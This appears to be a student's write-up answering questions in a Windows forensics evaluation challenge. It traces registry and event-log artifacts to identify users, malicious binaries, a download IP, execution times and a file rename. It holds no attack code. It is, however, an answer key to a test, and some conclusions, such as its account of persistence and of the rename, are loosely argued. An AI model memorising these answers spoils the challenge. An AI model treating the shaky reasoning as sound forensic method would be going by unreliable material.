Evaluation Challenge Write Up

# Evaluation Challenge Write Up ## What is the name of the computer? ![](https://i.imgur.com/7FIztPH.png) Computer Name : **DESKTOP-SUMKS54** Path : SYSTEM\ControlSet001\Control\ComputerName\ComputerName Location of the artifact : * Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\config\SYSTEM Tools Used : * FTK imager * Registry Explorer ## Who dropped the suspicious binary to disk? ![](https://i.imgur.com/PSBCfcs.png) **Craig Johnson** dropped the binary to disk Path : Software\Microsoft\Windows\CurrentVersion\Run ![](https://i.imgur.com/5JJTUYO.png) Event Log : Security.evtx From the above figure we can come to know that **Craig Johnson** executed the malicious scipt and dropped the binary into the disk Location of the artifacts : * Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Users\Craig Johnson\NTUSER.DAT * Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\winevt\Logs\Security.evtx Tools Used : * FTK imager * Registry Explorer * Event viewer ## Where was the suspicious binary acquired from? The suspicious binary was acquired from Downloads folder of **Craig Johnson** ![](https://i.imgur.com/fjRudbP.png) Path : * Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Users\Craig Johnson\Downloads\malicious.exe Tool Used : * FTK imager * Registry Explorer ## When were the user account Alissa Miller & Ravi created? ![](https://i.imgur.com/K0nuNGE.png) Alissa Miller profile was created on **2022-04-09 09:07:27** Ravi profile was created on **2022-04-09 09:07:59** Location of the artifact : * Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\config\SAM Path : SAM\Domains\Account\Users Tool Used : * FTK imager * Registry Explorer ## How many times the user Alissa Miller enter wrong password during login? ![](https://i.imgur.com/VibDWfu.png) **5** times Alissa miller entered wrong password Using event ID(4625) we can filter no.of times the login was failed and then search for Account Name : Alissa Miller Location of the Artifact : * Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\winevt\Logs\Security.evtx Tools Used : * FTK imager * Event viewer ## There is another suspicious binary present on disk. What is the IP from which it was downloaded? The suspicious binary present on the disk is downloded with the ip address **192.168.56.1** ![](https://i.imgur.com/a3UA6s0.png) The above snippet was taken from **_Microsoft-Windows-PowerShell%4Operational_** event log we can see that malware2.exe is being downloded from the website with the ip address 192.168.56.1 Location of the Artifact : * Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx Tools Used : * Event viewer * FTK imager ## Does any of the suspicious binary have persistence in the system. Please provide all the details you can. Yes the suspicious binary have persistence in the system it is accessing many important parts of the OS like powershell,cmd ![](https://i.imgur.com/gpL6Hxd.png) ![](https://i.imgur.com/2EVmeNy.png) Once accessing the powershell,cmd prompt can give whole access to the system. So,the suspicious binary have persistance in the system. Location of the Artifact : * Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\winevt\Logs\Security.evtx Tools Used : * FTK imager * Event viewer ## How many times was the original suspicious binary run & what are the timestamps of both the executions? malicious.exe was executed **2** times ![](https://i.imgur.com/Ughy3Ez.png) In secuirty.evtx log we can filter the ran executable files with the help of event ID 4688 and then using the option _save all events in custom view as csv_ using any csv opener open and then searching for _malcious.exe_ gives us the count of no.of times the `malicious.exe` was executed. **Timestamps of both the execution** ```TimeCreated [ SystemTime] 2022-04-09T09:31:50.8154385Z EventRecordID 75238 ``` ```- TimeCreated [ SystemTime] 2022-04-09T09:31:47.0587933Z EventRecordID 75225 ``` Location of the Artifact : * Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\winevt\Logs\Security.evtx Tools Used : * FTK imager * Event viewer ## Did the other suspicious binary execute in the system? Yes,it was executed **1** times. ![](https://i.imgur.com/lKmPl2t.png) In secuirty.evtx log we can filter the ran executable files with the help of event ID 4688 and then using the option _save all events in custom view as csv_ using any csv opener open and then searching for malware2.exe gives us the count of no.of times the malware2.exe was executed. ```TimeCreated [ SystemTime] 2022-04-09T09:31:51.2263011Z EventRecordID 75258 ``` Location of the Artifact : * Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\winevt\Logs\Security.evtx Tools Used : * FTK imager * Event viewer ## When was the file “World Hello.txt” renamed to its current name? ![](https://i.imgur.com/83lGUTQ.png) The above snippet was taken from NETUSER.dat of User Ravi in NETUSER.dat it stores all the information related to that particular user. In the recent documents key we can find there is only one text file which was last accessed at 2022-04-09 09:28:24. Path : Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt ![](https://i.imgur.com/DTtev8Q.png) The above picture shows the Documents dir of user : ravi in which we can find the _.txt_ which was last modified on 09-04-2022 09:28:33 The above mentioned both are same files if they are different files then in NETUSER.dat of ravi under recent docs we could found two different keys but there is only one. So `Hello World.txt` was renamed to `World Hello.txt` at **09-04-2022 09:28:33** Location of the Artifact : * Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Users\Ravi\NTUSER.DAT Tools Used : * FTK imager * Regsitry Explorer